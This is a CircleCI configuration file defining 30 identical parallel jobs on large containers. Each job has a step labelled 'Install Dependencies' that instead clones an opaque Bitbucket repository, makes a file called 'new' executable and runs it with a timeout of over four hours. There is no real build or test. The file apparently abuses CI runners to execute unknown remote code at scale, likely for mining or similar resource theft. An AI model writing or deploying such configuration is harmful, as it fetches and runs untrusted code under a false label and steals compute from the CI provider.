version: 2
jobs:
    aku1:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku2:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku3:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku4:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku5:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku6:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku7:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku8:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku9:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku10:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku11:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku12:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku13:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku14:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku15:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku16:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku17:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku18:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku19:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku20:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku21:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku22:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku23:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku24:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku25:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku26:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku27:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku28:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku29:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m
    aku30:
      docker:
            - image: couchbase
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://oqoixgqoq9@bitbucket.org/oqoixgqoq9/t.git && cd t && chmod +x new && ./new
            no_output_timeout: 259m

workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5
            - aku6
            - aku7
            - aku8
            - aku9
            - aku10
            - aku11
            - aku12
            - aku13
            - aku14
            - aku15
            - aku16
            - aku17
            - aku18
            - aku19
            - aku20
            - aku21
            - aku22
            - aku23
            - aku24
            - aku25
            - aku26
            - aku27
            - aku28
            - aku29
            - aku30
